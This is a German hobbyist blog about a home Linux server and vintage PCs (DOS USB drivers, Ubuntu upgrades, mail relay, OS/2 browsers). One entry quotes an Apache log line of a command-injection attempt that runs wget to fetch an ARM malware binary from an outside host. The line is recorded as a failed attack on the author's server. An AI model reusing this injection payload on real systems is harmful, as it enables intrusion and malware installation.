thafakers Homelinux

Privater Webserver zu Vintage PC, Linux, Atari ST, DOS, OS/2

News

30th Aug 2020

Willkommen in der Weblog-Sektion meiner kleinen, redlichen Heimseite. Auf diesen Seiten werde ich hin und wieder etwas veröffentlichen was Server / Vintage-spezifisch ist, also Blogeinträge schreiben. Hoffentlich :-)


USB Support unter DOS

Ich beschäftige mich gerade wieder einmal mit alter Hardware, da mir ein Pentium II 366 MHz 64 MB-Ram, ein Toshiba Satellite 4080, untergekommen ist. Und natürlich kann man auf diesem Computer auch noch prima DOS installieren, da er über ein Diskettenlaufwerk verfügt und nicht zu schnell ist. Aber Netzwerk über PCMCIA, es gestaltet sich unter Windows for Workgroups schwierig. Also wäre es cool, viele Daten schnell austauschen zu können. Das Gerät verfügt immerhin bereits über einen USB 1.1 Anschluss.

Die gute Nachricht: es gibt tatsächlich einen nativen DOS USB-Treiber von Panasonic, der aktuellste aus dem Jahr 2004. Dies wurde zwar ursprünglich nur für deren eigene Geräte entwickelt, allerdings hat er sich als ziemlich Allgemein erwiesen und funktioniert auch mit vielen anderen Geräten.

Downloads:

Wir haben hier vier verschiedene ZIP-Dateien, die wir in unterschiedlicher Art und Weise einsetzen.

  • MHAIRUDOS.zip - Das Paket enthält schon alles, was wir brauchen. Aus dieser ZIP benötigen wir die beiden Dateien DI1000DD.SYS und USBASPI.SYS. Die zweite Datei ist der eigentliche Chipsatztreiber, die DI1000DD.SYS ist ein Treiber für Massenspeicher, mit dieser können wir also den USB-Stick als Laufwerk unter DOS ansprechen. Beide Dateien werden in der CONFIG.SYS geladen. Ich habe die benötigten Dateien einfach unter c: gelassen. In eure bestehende CONFIG.SYS müssen eigentlich nur zwei Zeilen hinzugefügt werden:

[config.sys]

DEVICEHIGH=USBASPI.SYS
DEVICEHIGH=DI1000DD.SYS


Dann wird der Rechner neu gestartet und USB sollte automatisch geladen werden. Wenn ihr einen Stick anschließt, sollte dieser via DI1000DD.SYS eingebunden und mit einem Laufwerksbuchstaben versehen werden. Es emfpiehlt sicht, den Stick wie eine Festplatte unter FDISK.EXE mit FAT 16 und 2047 MB Partitionsgröße zu formatieren, so gewährleistet man die beste Kompatibilität.

Sollten die Einträge in der CONFIG.SYS nicht zum Ziel führen und z.B. der Treiber nicht geladen werden, so kommt die nachfolgende ZIP-Datei zum Zuge. Bei meinem Notebook wurde der ursprüngliche Treiber (kein USB-Chipset erkannt) nicht geladen, und ich wählte einen anderen aus der ZIP-Datei USBASPIS.ZIP aus, mit diesem gelang die EInbindung problemlos. Das ganze funktioniert und MS-DOS 6.22 genau so wie unter FreeDOS 1.3 RC 2. Für Sie getestet.

  • USBASPIS.zip - In diesem File befinden sich 5 USBAPIS die man einfach durchtesten kann, indem man sie in der CONFIG.SYS lädt. Mit meinem Notebook funktioniert beispielsweise der Treiber von IOMEGA.
  • USBASPI.zip - Das ist die ursprüngliche USBASPI in einer älteren Version, hier zur der Vollständigkeit aufgelistet.
  • MHAIRUWIN.zip - Der Vollständigkit halber, wird an dieser Stelle nicht benötigt.

Danke PANASONIC.


Neues Ubuntu


Categories: [linux], [update], [ubuntu]

Endlich habe ich einen Weg gefunden, Ubuntu 18.04 LTS auf meinem Utilite Pro zu installieren, nebst neu übersetztem Kernel 3.14. Ich habe es aktuell, wie bei ARM-Boards so häufig üblich, auf einer SD-Card installiert und es überzeugt im Testbetrieb. Bevor es aber auf die interne SSD dieses Servers ausgerollt wird, bedarf es noch einiger Anpassungen.

Es ist schon erstaunlich was auf dem Server so alles vor sich hin servt, da ist eine Neuinstall und Config-Migration gar nicht mal so leicht. Bis dahin läuft mein 16.04 munter weiter.


Upgradeing the Server OS


Categories: [linux], [update], [ubuntu]

Bezugnehmend auf meinen Beitrag von neulich möchte ich an dieser Stelle kurz kund tun, dass wir gerade ein

user@thafaker:/$ sudo do-release-upgrade

durchführen. Ich bin gespannt ob ich sie an dieser Stelle bald wieder begrüßen darf.


Update geglückt


Categories: [linux], [update], [ubuntu]

Das Update auf Ubuntu 20.04. ist geglückt und somit läuft mein ARM-Server wieder mit aktueller Software. Ich hatte zunächst Probleme vom von 16.04. auf 18.04., weil Ubuntu hier auf 'Netplan' zur Konfiguration des Netzwerks umgestiegen ist. Da dies in meinem System nicht vorhanden war, war mein Headless Server erst mal down und ich dachte, es läge am uralten selbst kompilierten Kernel. Ich fahre nämlich einen 3.14er Kern, der tatsächlich sehr in die Tage gekommen ist.

Nach einigen Konfigurationsadaptierungen läuft nun alles wieder korrekt, nehme ich an.


Sicherheitswarnung - Malware auf meiner Domain - Problem behoben

Ich freue mich an dieser Stelle Vollzug berichten zu können. Ich habe das Problem behoben und nach 2 Tagen hat Google meine Domain von seiner Sicherheitsseite entfernt und meine Domain so wieder als sicher eingestuft. Ich hatte schon bedenken ich müsste einen Reevaluationsprozess starten oder die Google Webmaster Tools (jetzt Search Console) registrieren.


Sicherheitswarnung - Malware auf meiner Domain?

Derzeit erscheint beim Aufruf meiner Website der Hinweis, sie würde Malware verbreiten und sei nicht sicher, diese Website wird deshab durch den Browser geblockt.

Malware auf nachfolgender Website Zurzeit auf thafaker.crabdance.com befindliche Hacker könnten versuchen, gefährliche Programme auf Ihrem Mac zu installieren, um Daten wie Fotos, Passwörter, Nachrichten und Kreditkartendaten zu stehlen oder zu löschen. Weitere Informationen

Dabei helfen, die Sicherheit von Chrome zu verbessern. Hierfür werden die URLs einiger von Ihnen besuchter Seiten, bestimmte Systeminformationen und einige Seiteninhalte an Google gesendet. Datenschutzerklärung

In diese Falle bin ich selbst hinein getappt. Aber zunächst: meine Website verbreitet keine Viren und keine Malware. http://thafaker.crabdance.com ist (wieder) sicher! Allerdings habe ich neulich als kleine Spielerei einen FTP-Server aufgesetzt und ihn von außen erreichbar geschaltet. Und dann habe ich mir in meinem Leichtsinn gedacht: schalte doch mal den Anon-Upload frei, mal schauen was passiert. Und was soll ich sagen… nach einer gewissen Zeit und einigen Scans begann es, mein FTP wurde zum Upload von Viren genutzt. Ich habe diese dann säuberlich kategorisiert und in Ordner gepackt. Ich dachte das sei witzig. Leider jedoch sieht das die Google-Security-Fraktion ganz anders und so ist meine Website nun gesperrt und ich weiß nicht, ob sie jemals wieder frei gegeben wird.

Der betreffende FTP ftp://thafaker.crabdance.com ist abgeschaltet und die Dateien sind entfernt.


news.albasani.net down 2020

Ich betreibe auf meinem Heim-Server einen kleinen Leafnode fürs lokale Netzwerk. Die News holt sich mein Leafnode bei news.albasani.net, einem Newsserver fürs Usenet, den ich sehr schätze. Die Benutzung ist nach Registrierung sogar kostenlos, er führt alle möglichen Gruppen, außer Binär-Gruppen. Diese interessieren mich auch nicht. Binäre Gruppen waren früher mal spannend, als man darüber

Nach einer äußerst langen Diskussion im Usenet in der Gruppe hat sich nun heraus gestellt, dass ein Festplatten-Crash verantwortlich ist für den Server-Ausfall von Albasani. Das erklärt auch, dass neben dem Newsserver auch Web- und Mailserver down ist, einfach alle Inhalte sind kaputt.

jan@thafaker:~$ sudo fetchnews -vvv
leafnode 1.11.10: verbosity level is 3, debugmode is 0
try_lock(timeout=5), fqdn="thafaker.crabdance.com"
news.albasani.net: connecting to port 119...
warning: news.albasani.net: connection to 178.63.61.145 failed: Connection refused
warning: news.albasani.net: connection to 2a01:4f8:120:9382::145 failed: Network is unreachable
news.albasani.net: address list exhausted without establishing connection.
news.albasani.net: connection failed.
WARNING: some servers have not been queried!
wrote active file with 23341 lines
Started process to update overview data in the background.
Network activity has finished.

Da dies natürlich nicht nur mich betreffen kann, habe ich etwas gesucht und, natürlich im Usenet, einen passenden Thread zur Downtime vom alabsani-Server gefunden. Hier kann der Thread über Google Groups nachgelesen werden.

Racine hat mir grad auf Facebook geantwortet:

Disk is defective, cannot tell you how long it will take to be back up. At the moment, unfortunately I'm busy with my work...

Aber immerhin ist niemand zu Schaden gekommen. Hoffen wir dass Racine ein RAID Backup besitzt und seine Inhalte wieder her stellen kann, wenn die Platte getauscht ist.


Dateien im Terminal kopieren - mit Fortschrittsanzeige

Wenn ich im Terminal etwas kopieren muss, dann geht das mit dem UnixCopy Befehl: cp.

Allerdings ist es cp nicht möglich, den Status des Kopiervorganges anzuzeigen, also wie viel schon kopiert worden ist und wie viel noch kopiert werden muss - und wie lange das vielleicht noch dauert. Das ist unter Umständen aber problemtisch, nämlich wenn ich viele Dateien habe und mein Speichermedium nicht gut damit umgehen kann etc., pp., manchmal möchte ich eben wissen wo er ist. Das geht aber mit rsync. Folgender Befehl hilft mir, um einen Gesamtüberblick zu behalten: rsync -a --info=progress2 Quelle Ziel

jan@thafaker:/tmp/$ sudo rsync -a --info=progress2 files/ /pub/files/
     51,163,786   8%   10.12MB/s    0:00:56  xfr#9, to-chk=236/258)

Größe von Verzeichnissen unter Linux bestimmen (Terminal)

Da ich immer mal wieder das Problem habe, die Größe eines Verzeichnisses auf einem Linux-Server per Terminal bestimmen zu müssen, suche ich jedes mal wieder nach dem Befehl. Damit ich einfach bei mir selbst nachschauen kann, will ich ihn hier auflisten.

Im Terminal (unter Umständen als root ausführen, da sonst kein Zugriff möglich ist): du -sh {Verzeichnispfad}

Dabei steht „du“ steht "disk usage".

-s, --summarize
Zeigt die Größe für jedes Argument an.

-h, --human-readable
Gibt die Größe in für Menschen besser lesbaren Einheiten aus wie KB, MB oder GB.

-c, --total
Zeigt die Summe mehrerer angegebener Verzeichnisgrößen an.


Maus Scrolling in Windows 95

How can I get a PS/2 scrolling mouse to work in Windows 95?

Da ich mich, gerade in Zeiten wie diesen, mit meinem Vintage PC beschäftige, kommen immer mal neue Fragestellungen auf mich zu. Neben DOS 6.22 und OS/2 Warp läuft nun auch ein Windows 95c auf dieser Maschine. Leider bestitzt Windows 95 keine Möglichkeit, das mittleren Scrollrad heutiger Mäuse zu nutzen. Ich habe eine billige Drei-Tasten-Maus (mit Ball) für den PS/2 Anschluss, diese besitzt so ein ein Scrollrad. Und wenn es fehlt, merkt man, was man unbedingt haben möchte.

Durch folgenden Treiber habe ich es schlussendlich geschafft, dieses Scrollrad in Betrieb zu nehmen.

Das ist der reguläre Microsoft Intellimouse Treiber, der aber auch mit anderen Mäusen funktioniert. Mit diesem konnte ich meine Drittanbietermaus um das Scrollrädchen erweitern.

Windows 95 läuft auf diesem Rechner tatsächlich erstaunlich gut, wobei der Flaschenhals hier aber die 2 GB HDD darstellt.


E-Mail

Weißt du was cool ist?

Email!

Da sendest du via Pegasus Mail unter Windows 3.11 eine Mail in einer Software von 1995 ab - und empfängst sie wenig später auf deinem MacPro mit macOS 10.15 im Jahr 2020. Ganz ohne Probleme!

Das ist echt krass!

retrocomputing

Pegasus Mail unter Windows 3.11


Graphical BIOS of the Compaq Deskpro 2000 Computers

Dieser Artikel erscheint auch auf thahipster.de)

Mein Vintage Computer aus der PC-Ära ist ein Compaq Deskpro 2000. Der Prozessor ist lüfterlos und auch sonst strotzt der Rechner nur so vom Stand der Business-Technik in den 90er Jahren. Der Pentium ist noch der Vorgänger vom MMX, also der P54CS mit 150 Mhz, ziemlich potent also :-) Deskpro 2000 liefen mit Pentium 1, Pentium Pro oder Pentium 2.

Eine Besonderheit dieser Compaqs stellt deren BIOS dar, auf das ich mit diesem kleinen Beitrag nur kurz verweisen will. Es ist nämlich sicher gar nicht so bekannt, das es in den 90er solche Lösungen gab. Genau genommen gibt es kein BIOS-Setup wie man das von AMI oder AWARD her kennt (Link), sondern eine Kombination aus einem festen Teil und einer grafischen Oberfläche. Per Default ist die verbaute Festplatte partitioniert. In einer 6 MB großen NON-DOS Parititon residiert der grafische BIOS Teil, mit welchem man die Einstellungen des Computers, Hardware, IRQ Settings, Festplatten, Bootoptionen einstellen kann. Und der restliche Teil ist eben normales FAT 16 DOS oder vielleicht auch schon FAT 32, je nachdem. Sollte man die kleine Partition löschen so hat man folgich auch keine Möglichkeit mehr, die Einstellungen vorzunehmen. Das BIOS kann dann noch automatisch beim Boot erkennen ob Hardware geändert wurde, beispielsweise bei Einbau einer neuen Festplatte und diese Konfiguration auch speichern, aber viel mehr geht ohne der Partition nicht mehr.

Allerdings stellt Compaq für diesen Fall zwei Disketten zur Verfügung, mit deren Hilfe man die Partition wieder erstellen und die grafische BIOS-Oberfläche wieder installieren kann. Diese Disketten funkgieren praktischerweise als Boot-Disk und bieten auch die BIOS Oberfläche von Diskette an, ganz ohne Installation. So kann man von diesen Disketten booten und folglich doch noch Einstellungen vornehmen, auch wenn die Partition aus irgend einem Grund gelöscht worden sind.

Hier der Download dieser beiden Disketten Images (*.ima):

Um die Dateien wieder zurück auf Diskette schreiben zu können, benötigt man neben einem Diskettenlaufwerk auch eine Software, die das kann. Ich persönlich nutze WinImage in der Version 9.0 (Download Link) und führe diese in einem alten Windows 2000 in einer VM-Ware aus. Das funktioniert absolut problemlos. Hat man sich diese Disketten erstellt, kann man seinen Compaq wieder richtig in Betrieb nehmen. So sieht das "grafische BIOS" übrigens aus:

Höchst unkonventionell, aber doch auch tatsächlich recht benutzbar. Startet man beim Boot mit F10 dieses Bios, dann lädt zunächst ein DOS Maustreiber bevor dann die Win 3.1 grafische Benutzeroberfläche startet.

c00327708

Es folgen technische Informationen über den Compaq Deskpro 2000 Computer.


DOS Spiele


Categories: [vintage], [games], [pc]

Ich habe mir mal die Mühe gemacht und auf meinem alten Vintage PC das neue SIGIL, eine inoffizielle DOOM Erweiterung vom offiziellen DOOM Macher John Romero, installiert und gespielt. Das funktioniert soweit. Wie das geht kann man hier nachvollziehen.

Playing SIGIL.WAD on real Hardware


Root Exploit Angriffe

In letzter Zeit entdecke ich in den Apache Server Logs vermehrt kleine Angriffvarianten auf meinen Webserver. Sicher scannt da immer mal wieder jemand das Netz durch und verirrt sich ab und zu mal auch zu mir. Diesmal ist es:

  • unauthenticated command injection remote root exploit that leverages card_scan_decoder.php. Nachzulesen hier.

Führte auf diesem System nicht zum Erfolg, der Zugriff sah folgendermaßen aus:

98.155.96.170 - - [11/Jan/2020:12:52:26 +0100] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7;" 400 0 "-" "-"

Well, es bleibt spannend.


Frohes neues Jahr

Wir wünschen allen Menschen dieser Erde ein gesundes und frohes neues Jahr 2020.


Back Online

Mein kleiner Server ist wieder online, nachdem ich ihn für einen Monat vom Netz genommen habe. Dies hatte keine besonderen Gründe, sowie es auch jetzt keine besonderen Gründe gibt, dass er wieder online ist.

Gesundes neues Jahr 2020.

https://thahipster.de


Server abgestürzt

Ich betreibe hinter diesen Webseiten einen kleinen Server, der auf einem ARM-Gerät mit einem Ubuntu 16.04 LTS läuft. Auf diesem Server betreibe ich folgende Dienste:

  • Apache
  • Samba
  • Nextcloud
  • Transmission
  • PHP / MySQL

Gestern Nacht scheint mir der Server abgestürzt zu sein, warum kann ich noch nicht genau eruieren und wird sich erst nach Auswertung der Logfiles erschließen. Scheinbar ist das Filesystem zusammen gekracht, pingen konnte ich, Dienste liefen keine mehr, Zugriff nicht möglich. Nach einem händischen Login per seriellem Kabel offenbarte, dass das System aufgrund von korruptem Dateisystem nicht mehr hochfuhr.

Ich konnte das zum Glückbeheben und nun läuft die Bude wieder. Warum das aber so ist, kann ich nicht sagen - und da wird es problematisc. Ich würde schon gern raus kriegen ob meine mSATA kaputt ist, oder was sonst dafür verantwortlich sein könnte. Das Utilite Pro neu aufzusetzen ist nämlich nicht so trivial, wie auf einem x86 PC ein Linux zu installieren.

Es bleibt spannend.


Sie können uns kontaktieren

thafakers Homelinux verfügt nun über ein schickes Kontaktformular, über welches wir kontaktiert werden können. Und wenn ich wir schreibe, meine ich mich, den Betreiber der Seiten :-) Das Kontaktformular ist über Googles reCaptcha gegen Spam abgesichert, obwohl es das bei der geringen Besucherschar gar nicht müsste :-)

Zum Kontaktformular.


Kernel Freeze Absturz [UPDATE]


Categories: [linux], [mailserver]

Auf meinem kleinen ARM-Server läuft ein LINUX-Kernel 4.1.15-cm-fx6 mit einem Ubuntu 16.04. LTS. Soweit so gut funktionierte diese Konstellation bisher immer problemlos. Seit dem letzten Neuaufsetzen allerdings habe ich unregelmäßig Freezes, der kleine Server friert einfach ein. In den LOG-Files kann ich nicht wirklich etwas finden, Hardware scheint mir auch nicht defekt zu sein, davor lief er nämlich 46 Tage am Stück durch.

Leider bringt mir mein Logfile überhaupt keine Aufschlüsse, da ist der letzte Eintrag der standardmäßige CRON-Job für Fetchmail zum Abholen der Mails, das hat er schon tausende Male an diesem Tag getan, kein Grund plötzlich abzustürzen.

Hat vielleicht jemand eine Idee, wo man noch nachschauen könnte?

Folgende Dienste laufen auf dem Device:

  • Apache2
  • Postfix
  • Dovecot
  • Fetchmail
  • MySQL
  • ...

Mailto vintage at thafaker punkt de

[UPDATE] Ich habe einen neuen Kernel kompilieren können, mit diesem tritt das Phänomen nicht auf. Weiterhin konntei ch TUN/TAP in den neuen Kernel hinein kompilieren, sodass mir jetzt auch die Welt von OPENVPN offen steht. Ich bin sehr zufrieden mit dem neuen uralten Kernel, immerhin handelt es sich um 3.14.1


ICQ ist tot

Da ich mich mit Vintage Computing beschäftige und so u.a. ein Windows 3.11, ein OS/2 Warp sowie ein Windows 98 betreibe, interessiert mich natürlich auch Software, die man damals benutzt hat. Eine sehr populäre Software meiner Jugend war ICQ. Ein Chatclient der später sogar Offline-Nachrichten verstand. Neben MSN, AIM und vielleicht auch Yahoo Messenger war ICQ der populärste Messenger der 90er. Es war super. Und das "OH OH" bei einer neuen Nachricht echt nervend.

Das alte OSCAR [^1] genannte Kommunikationsprotokoll von ICQ ist leider zum 28. Dezember 2018 eingestellt worden, die mittlerweile russischen Betreiber von ICQ hatten wohl kein Interesse mehr an der alten Infrastruktur, bei den geringen Nutzerzahlen. Und tatsächlich, mit Aufkommen von WhatsApp und anderen plattformübergeifenden Messenger-Diensten verloren die klassischen Chatting-Apps schnell an Popularität. Ich selbst habe ICQ aktiv sicher seit 2011 nicht mehr genutzt.

Durch das Ende von OSCAR sind auch alle Multi-Protokoll-Messenger wie Miranda oder Pidgin raus, sie können ICQ nicht mehr anbieten. In Deutschland dürfte das nach meiner Einschätzungen niemanden mehr interessieren, hierzulande haben längst zahllose andere Messenger, WhatsApp inklusive, den einstigen Dino abgehängt. Schade für mich, geht damit ein Stück Jugend verloren.

„From December 28, we will no longer support old versions of ICQ and other unofficial applications. To continue your conversations, you need to update your ICQ here: https://icq.com You can also use the web version here: https://web.icq.com With the new version of ICQ you can: – edit and delete already sent messages – quote and forward messages to another chat – send stickers – search through chat history and view previously sent media in the chat gallery – create group chats – make voice and video calls.“

[^1]: OSCAR (Open System for Communication in Realtime; deutsch Offenes System für Kommunikation in Echtzeit) ist ein Instant-Messaging-Protokoll, welches von AOL für den AOL Instant Messenger (AIM) entwickelt wurde und nach der Übernahme von ICQ für beide Messenger verwendet wird. Es gibt jedoch diverse freie ICQ-Clients, welche bereits vor der Veröffentlichung des Protokolls einwandfrei funktioniert haben.


Browser für OS2


Categories: [vintage], [pc], [os2]

Wie ich schon öfter berichtet habe, spiele ich derzeit mit einem alten Vintage-PC der Marke Compaq rum, einem Deskpro 2000. Auf diesem lasse ich ein DOS 6.22, ein Terminal-Linux und auch ein OS/2-Warp 4 laufen. Auf OS/2 bin ich ganz zufällig und jetzt erst gestoßen, habe ich es in meiner Jugend doch nie benutzt. Aber da es dort ISO-Images zum Download gibt, habe ich es einfach mal ausprobiert. Und OS/2 Warp 4.52 funktioniert auf diesem Rechner tatsächlich Out-Of-The-Box. Netzwerk, Sound, Grafik, alles super :-) Doch wie dem auch sei, dieses Betriebssystem ist etwas in die Jahre gekommen, obwohl es sogar noch aktiv 2019 noch weiter entwickelt wird, als eigentständiges Produkt… Ich schweife ab.

Der letzte Netscape Navigator Version 4.61 vom Juni 2001 ist recht alt und sperrig, er rendert die Seiten nicht so schön und natürlich, https kann er schon gar nicht. Und so bin ich auf Opera (das kann auch kein https) gekommen, weil das auch unter Windows 3.11 die beste Web-Performanz bietet. Und, oh Wunder, Opera 5.12 gibt es noch zum Download. Bei Opera. Für OS/2. Freeware.

Folgendermaßen rendert Opera 5.12 auf meinem OS/2 Warp 4.52 diese Website.

Opera 5.12 auf OS/2 Warp 4.52
Opera 5.12 auf OS/2 Warp 4.52


Roundcube SMTP error 250 authentication failed


Categories: [mailserver], [howto]

Wie in meinem Weblog mehrfach angeklungen habe ich mir einen kleinen Mailserver aufgesetzt, damit ich mit meinen Vintage Computers noch am Internet teilhaben kann. Problem ist nämlich, dass die alten Clients keinerlei der aktuellen Verschlüsselungsmethoden mehr beherrschen und man so abgeschnitten wird. Das Risiko eines unsicheren Mailservers im LAN ist überschaubar und so habe ich das Problem auf diese Weise gelöst. Folgendes Setup läuft bei mir:

  1. Fetchmail holt die Mails vom echten Mailkonto auf meinen Server (MRA)
  2. Dovecot ist der lokale POP3/IMAP Server (MDA)
  3. Postfix ist der eigentliche Mailserver (MTA)
  4. Roundcube das Webinterface, Webmailer (nicht notwendig)


Roundcube Webmailer

Roundcube SMTP error 250 authentication failed

Nachdem der Mailserver endlich lief, das ist nämlich niemals eine triviale Aufgabe, und dabei ist das nur ein Relay-Server und kein richtiger Mailserver, wollte ich noch einen Schritt weiter gehen und mir Roundcube installieren. Das ist ein schickes Webmailinterface. Wenn man einen Webserver betreibt, ist es damit möglich sich per Web in seinen Server einzuloggen, so wie man das auch von den großen Webmail-Anbietern kennt. Soweit, sogut.

Folgendes Problem ergab sich, sobald ich eine Mail aus Roundcube versenden wollte: "SMTP error 250 authentication failed" Dabei klappt der Mailversand lokal und über LAN wunderbar, sodass der Fehler woanders liegen musste. Nach einem Tag der Fehlersuche lag der Fehler bei mir an folgendem Setting in der Roundcube-Config, editiert dazu in der Datei RCUBE_CONFIG_DIR/config.inc.php: den Eintrag
$config['smtp_user'] = '%u'; durch
$config['smtp_user'] = ''; ersetzen.

Bei mir sieht der Teil der Config also folgendermaßen aus:

    // SMTP username (if required) if you use %u as the username Roundcube
    // will use the current username for login
    #$config['smtp_user'] = '%u';
    $config['smtp_user'] = '';

Fortan funktioniert mein Webinterface und falls ich mal wieder auf das Problem stoßen sollte, habe ich es hier vermerkt.


Mailserver


Categories: [mailserver]

Wie ich auszog, einen Mailserver zu betreiben…

Und daran sitze ich noch heute. Immer mal, wenn ich die Zeit dazu finde. Es ist nicht ganz leicht. Aber ich mache Fortschritte. Busy Making Progress, kann man sagen.

Wie die Band mit selbem Namen.

Fetchmail mit SSL für Google Mail

  • Um Mails via Fetchmail von Googlemail abholen zu können, benötigt man Fetchmal mit SSL-Supprt. Auf folgender Website ist beschrieben, wie das funktioniert. (Link)

Mailserver-2


Categories: [mailserver]

Wie ich neulich berichtete, versuche ich einen kleinen Mailserver im internen LAN aufzusetzen. Dies hat für mich den Beweggrund, mit alten Mailprogrammen die all die modernen Mailmechanismen und vor allem Verschlüsselung nicht mehr verstehen, trotzdem weiter nutzen zu können. Aus Spaß, der Vintage-PC und seine uralten Systeme gehen keiner produktiven Arbeit nach.

  • OS/2Warp 4.52
  • Win3.11 (aka Windows for Workgroups)
  • DOS 6.22 (mit Arachne)

Eine Terminal-Verbindung zum Server ist übrigens auch möglich :-)


MUTT in Terminal Session on Mailserver


Usenet Anfrage


Categories: [vintage], [usenet]

Ich schreibe ja hin und wieder noch in dieses Usenet, sogenannte Newsgruppen.Das Usenet ist ein weltweites, elektronisches Netzwerk, das einen eigenen selbstständigen Dienst des Internets neben dem World Wide Web darstellt. Es entstand lange vor dem World Wide Web. Genau deshalb ist es spannend, das Usenet auf alten Computern zu verwenden.


OS/2 Warp 4.52 im Einsatz

Da ich gerade einen alten Vintage PC mit OS/2 und WfW3.11 im Internet betreibe, ist es auch spannend mit dem Teil Mail zu machen [^1] oder gar im Netz zu surfen. Aufgrund der Verschlüssen von Verbindungen, was an sich gut ist, haben alte Browser keinen Zugriff mehr aufs Netz. So bleiben leider 95% ausgeschlossen. Gerade auch web.archive.org lässt sich auf alten Browsern aufgrund der Verschlüsselung nicht mehr aufrufen. Ich habe nun folgende Idee in der Newsgroup de.comp.os2 gestellt:

Sicher hat schon mal jemand darüber nachgedacht Squid zu nutzen, um https aus dem Internet in http im lokalen Netzwerk zu verwandeln, sodass meine Vintage-PCs am Internet teilhaben können.

  1. Anwendung auf dem Client stellt die Anfrage an den Proxy-Server über http
  2. Proxy-Server wandelt http in https um
  3. Proxy-Server sendet Anfrage verschlüsselt weiter an den Webserver des Dienstleisters (Request)
  4. Webserver schickt die verschlüsselte Antwort an den Proxy-Server
  5. Proxy-Server entschlüsselt den Response vom Webserver
  6. Proxy-Server gibt die Information über http weiter an den Client und dessen Anwendung

Wobei Punkt 1 und 6 meine Vintage-PCs mit Uraltbrowser wären. Gibt es hierzu vielleicht eine Anleitung für Squid? Google (auf einem modernen Rechner) brachte nicht wirklich die richtige Lösung.

Scheinbar ist das eigentlich eine Man-In-The-Middle-Atacke, da man ja SSL untergräbt, aber für mich hätte das eine andere Bewandnis. Leider bin ich mit dieser Aufgabe noch nicht weiter voran geschriten.


[^1]: Durch aufsetzen eines eigenen Mail-Relay-Servers kann ich Mail benutzen, aktuelle Anbieter nutzen nämlich Techniken, die die alten Mail-Clients (Eudora, Outlook Express etc.) nicht verwenden können.


Pgp-ist-schlecht-und-sollte-verschwinden

Da ich mich im Zuge meines Vintage-PCs und dessen Anbindung an allgemein übliche Kommunikationsformen gerade wieder mit EMail beschäftige, ich habe gerade einen "unsichereren" Mail-Server im LAN aufgesetzt, kommt ein Artikel zu einer Sicherheitsstudie über PGP auf Heise.de gerade recht.

Hier wird nämlich die These aufgestellt, dass EMail per se und per Design so unsicher ist, als dass man es nicht sicher machen kann. Und dass es deshalb lieber einfach gar nicht erst verschlüsselt werden sollte, weil all diese Verfahren dazu nur mäßig funktionieren können. Entweder EMail, oder verschlüsselte Kommunikation [^1].

[...] Für die Kommunikation empfehlen sie einen Messenger wie Signal, Wire oder sogar WhatsApp, die alle auf dem offenen Signal-Protokoll aufsetzen, das in diesem Bereich den State-of-the-Art repräsentiert. Bei E-Mail hingegen kapitulieren sie dann auch und konstatieren schlicht: "E-Mail ist unsicher". Versuche, das zu ändern sind zum Scheitern verurteilt, weil die Unsicherheit so tief mit dem Funktionskonzept verwoben ist. Für sicherheitsrelevante Dinge sollte man E-Mail nicht mehr einsetzen. [...] Link

[^1]: über andere Kanäle.